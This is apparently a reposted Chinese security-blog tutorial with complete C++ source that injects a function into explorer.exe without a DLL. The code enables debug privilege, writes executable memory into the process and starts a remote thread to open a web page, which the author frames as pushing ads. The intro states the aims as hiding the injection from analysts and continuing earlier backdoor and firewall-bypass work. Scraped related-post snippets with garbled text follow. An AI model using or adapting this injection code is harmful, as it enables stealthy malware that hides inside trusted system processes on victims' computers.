2. 程式人生 > >安全之路 —— 無DLL文件實現遠程線程註入

安全之路 —— 無DLL文件實現遠程線程註入

阿新 發佈:2018-08-24
資源管理 dir 簡介 sdn wsize date process 地址 str

簡介

在之前的章節中,筆者曾介紹過有關於遠程線程註入的知識,將後門.dll文件註入explorer.exe中實現繞過防火墻反彈後門。但一個.exe文件總要在註入時捎上一個.dll文件著實是怪麻煩的,那麽有沒有什麽方法能夠不適用.dll文件實現註入呢?
答案是有的,我們可以直接將功能寫在線程函數中,然後直接將整個函數註入,這個方法相較之於DLL註入會稍微復雜一些,適用於對一些體積比較小的程序進行註入。但是要註意動態鏈接庫的地址重定位問題,因為正常的文件一般會默認載入kernel32.dll文件,而不會載入其他DLL,且只有kernel32.dll與user32.dll文件可以保證在本地和目的進程中的加載地址是一樣的,所以最好要在遠程線程函數中手動利用LoadLibrary和GetProcessAddress函數強制加載一遍DLL文件。Visual Studio在編譯此類功能的文件時建議關閉編譯器的“/GS”選項,還要其他需要註意的地方可參考此鏈接。
下面我們借助此方法實現讓Windows資源管理器explorer.exe實現彈網頁(發廣告)的功能,而分析人員卻無法從程序依賴的動態鏈接庫中找到我們註入線程用的DLL文件,達到了一定的隱藏效果。

代碼實現

//////////////////////////////
//
// FileName : InjectProcess.cpp
// Creator : PeterZheng
// Date : 2018/8/18 0:35
// Comment : Inject Process Without Dll File
//
//////////////////////////////

#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <string>
#include <string.h>
#include <windows.h>
#include <strsafe.h>
#include <tlhelp32.h>

#define MAX_LENGTH 50
#define NORMAL_LENGTH 20
#pragma warning(disable:4996)

using namespace std;

typedef struct _RemoteParam
{
    CHAR szOperation[NORMAL_LENGTH];
    CHAR szAddrerss[MAX_LENGTH];
    CHAR szLb[NORMAL_LENGTH];
    CHAR szFunc[NORMAL_LENGTH];
    LPVOID dwMLAAdress;
    LPVOID dwMGPAAddress;
    LPVOID dwSEAddress;
}RemoteParam;

DWORD WINAPI ThreadProc(RemoteParam *lprp)
{
    typedef HMODULE(WINAPI *MLoadLibraryA)(IN LPCTSTR lpFileName);
    typedef FARPROC(WINAPI *MGetProcAddress)(IN HMODULE hModule, IN LPCSTR lpProcName);
    typedef HINSTANCE(WINAPI *MShellExecuteA)(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
    MLoadLibraryA MLA;
    MGetProcAddress MGPA;
    MShellExecuteA MSE;
    MLA = (MLoadLibraryA)lprp->dwMLAAdress;
    MGPA = (MGetProcAddress)lprp->dwMGPAAddress;
    lprp->dwSEAddress = (LPVOID)MGPA(MLA(lprp->szLb), lprp->szFunc);
    MSE = (MShellExecuteA)lprp->dwSEAddress;
    MSE(NULL, lprp->szOperation, lprp->szAddrerss, NULL, NULL, SW_SHOWNORMAL);
    return 0;
}

DWORD GetProcessID(CHAR *ProcessName)
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot error");
        return 0;
    }
    BOOL bProcess = Process32First(hProcessSnap, &pe32);
    while (bProcess)
    {
        if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
            return pe32.th32ProcessID;
        bProcess = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);
    return 0;
}

int EnableDebugPriv(const TCHAR *name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
        &hToken))
    {
        printf("OpenProcessToken Error!\n");
        return 1;
    }
    if (!LookupPrivilegeValue(NULL, name, &luid))
    {
        printf("LookupPrivilege Error!\n");
        return 1;
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        printf("AdjustTokenPrivileges Error!\n");
        return 1;
    }
    return 0;
}

BOOL InjectProcess(const DWORD dwPid)
{
    if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;
    HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (!hWnd) return FALSE;
    RemoteParam rp;
    ZeroMemory(&rp, sizeof(RemoteParam));
    rp.dwMLAAdress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "LoadLibraryA");
    rp.dwMGPAAddress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "GetProcAddress");
    StringCchCopy(rp.szLb, sizeof(rp.szLb), "Shell32.dll");
    StringCchCopy(rp.szFunc, sizeof(rp.szFunc), "ShellExecuteA");
    StringCchCopy(rp.szAddrerss, sizeof(rp.szAddrerss), "https://www.baidu.com");
    StringCchCopy(rp.szOperation, sizeof(rp.szOperation), "open");
    RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteParam) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;
    LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteThread) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;
    HANDLE hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);
    if (!hThread) return FALSE;
    return TRUE;
}

int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    CHAR szProcName[MAX_LENGTH] = "\0";
    StringCchCopy(szProcName, MAX_LENGTH, "explorer.exe");
    InjectProcess(GetProcessID(szProcName));
    ExitProcess(0);
    return 0;
}

安全之路 —— 無DLL文件實現遠程線程註入

相關推薦

安全 —— DLL實現

資源管理 dir 簡介 sdn wsize date process 地址 str 簡介 在之前的章節中,筆者曾介紹過有關於遠程線程註入的知識,將後門.dll文件註入explorer.exe中實現繞過防火墻反彈後門。但一個.exe文件總要在註入時捎上一個.d

安全 —— DLL檔案實現遠端程序注入

簡介         在之前的章節中,筆者曾介紹過有關於遠端執行緒注入的知識,將後門.dll檔案注入explorer.exe中實現繞過防火牆反彈後門。但一個.exe檔案總要在注入時捎上一個.dll檔案著實是怪麻煩的,那麼有沒有什麼方法能夠不適用.dll檔案實現

安全 —— 藉助DLL進行遠端執行緒注入實現穿牆與隱藏程序

簡介        大多數後門或病毒要想初步實現隱藏程序,即不被像工作管理員這樣典型的RING3級程序管理器找到過於明顯的不明程序,其中比較著名的方法就是通過遠端執行緒注入的方法注入將惡意程序的DLL檔案注入系統認可的正常程序,你會發現工作管理員以及找不

程式設計師的量化交易(2)----Esper學習技術概覽(1)

在接下來的20個工作日中,我將堅持翻譯或者略翻譯Esper的官方文件。 為什麼需要學習Esper,因為我們需要理解複合事件處理 Complex Event Processing (CEP)。在量化交易系統中,CEP是必不可少的。它負責處理海量的實時事件。 關於CEP更多

安全 —— 利用APC隊列實現跨進

single obj 介紹 自己 for call 經典的 rap wait 簡介 在之前的文章中筆者曾經為大家介紹過使用CreateRemoteThread函數來實現遠程線程註入,毫無疑問最經典的註入方式,但也因為如此,這種方式到今天已經幾乎被所有安全軟件所防禦。所以今

測開二:讀寫

alt bsp http 文件讀寫 info 讀寫 技術分享 分享圖片 文件 open函數: 讀: 寫: 測開之路二:文件讀寫

java使用POI操作excel,實現批量導出,和導

tar.gz spa != nts big 應該 關於 override auth 一、POI的定義 JAVA中操作Excel的有兩種比較主流的工具包: JXL 和 POI 。jxl 只能操作Excel 95, 97, 2000也即以.xls為後綴的excel。而po

jmeter 正則獲取多個返回token至本地,並跨組調用

mage 表達 processor csv文件 參數 res 例如 通過 mark 1、打開jmeter,創建setup Thread Group對於setup Thread Group和tearDown Thread Group來說,從字面意思上來看就是安裝線程組和卸載線

安全 —— 利用的方法(使用DLL實現穿墻與隱藏進

pat 完整路徑 ystemd return cpi printf output inf server 簡介 大多數後門或病毒要想初步實現隱藏進程,即不被像任務管理器這樣典型的RING3級進程管理器找到過於明顯的不明進程,其中比較著名的方法就是通過遠程線程註

安全 —— C/C++實現後門的服務自啟動

net tom html 註冊表自啟動 bin hide any patch format 簡介 Windows NT系統後門要實現自啟動,有許多種方法,例如註冊表自啟動,映像劫持技術,SVCHost自啟動以及本章節介紹的服務自啟動等方法,其中服務自啟動相對於上述其他三種

安全 —— 利用SVCHost.exe系統服務實現後門自啟動

cas default wait cal tis lis success 放置 簡介 簡介 在Windows系統中有一個系統服務控制器,叫做SVCHost.exe,它可以用來管理系統的多組服務。它與普通的服務控制不同的是它采用dll導出的ServiceMain主函數實現服

安全 —— C++實現守護

之前 aps serve query value isa process read subst 簡介 所謂進程守護,就是A進程為了保護自己不被結束,創建了一個守護線程來保護自己,一旦被結束進程,便重新啟動。進程守護的方法多被應用於惡意軟件,是一個保護自己進程的一個簡單方式

通過COM組方式實現java調用C#寫的DLL

time rar .exe 字符串 sys 還需 第一個 運行 system 最近一段時間單位在做一個Web項目,工程師用JAVA語言,需要公用人員信息,統一用戶名和密碼,原有的平臺中是用C#語言開發的,在網上查找解決方法,通過JAVA調用C#的DLL文件實現。網上

安全 —— C++實現程序守護

簡介 所謂程序守護,就是A程序為了保護自己不被結束,建立了一個守護執行緒來保護自己,一旦被結束程序,便重新啟動。程序守護的方法多被應用於惡意軟體,是一個保護自己程序的一個簡單方式,在ring3下即可輕鬆實現。而建立守護執行緒的方法多采用遠端執行緒注入的方式,筆

使用Spring配置實現AOP

result 第一個 .com targe 細節 cat xsd 修改 描述 使用Spring配置文件實現AOP 前面我們已經學會了使用Spring的註解方式實現AOP,現在我們就要學習使用Spring配置文件實現AOP。本文是建立在使用Spring的註解方式實現AOP的

day1作業:編寫登錄窗口一個實現

insert size strong 文件類型 增加 機會 如果 user_list ssa 思路: 1、參考模型,這個作業我參考了linux的登錄認證流程以及結合網上銀行支付寶等鎖定規則; 1)認證流程參考的是Linux的登錄:當你輸入完用戶名

《UNIX環境高級編》讀書筆記系統數據和信息(1)

返回 -m 獲取 高級編程 記得 clas oid data- size 1.UNIX系統口令文件包括了下圖所看到的的各字段,這些字段包括在<pwd.h>中定義的passwd結構體中 POSIX定義了兩個獲取口令文件項的函數。在給出用戶登錄名或用戶ID後

上傳實現方法

exception -c 實現 public input res nec tco -type public static String formUpload(String urlStr, Map<String, String> textMap, Map<S

awk命令 - 統計/etc/passwd中各用戶所使用的shell類型及出現次數

linux 命令 awk 統計/etc/passwd文件中各用戶所使用的shell類型及出現次數awk -F: ‘BEGIN{printf"%-15s\t%s\n","ShellType","Count"}{shellType[$NF]++}END{for(i in shellType)print

【SSH進階】Struts基本原理 + 實現簡單登錄(二)

target doctype 掌握 pack insert enter snippet file manage 上面博文,主要簡單的介紹了一下SSH的基本概念,比較宏觀。作為剛開始學習的人可以有一個總體上的認識,個人覺得對學習有非常好的輔助功能,它不不過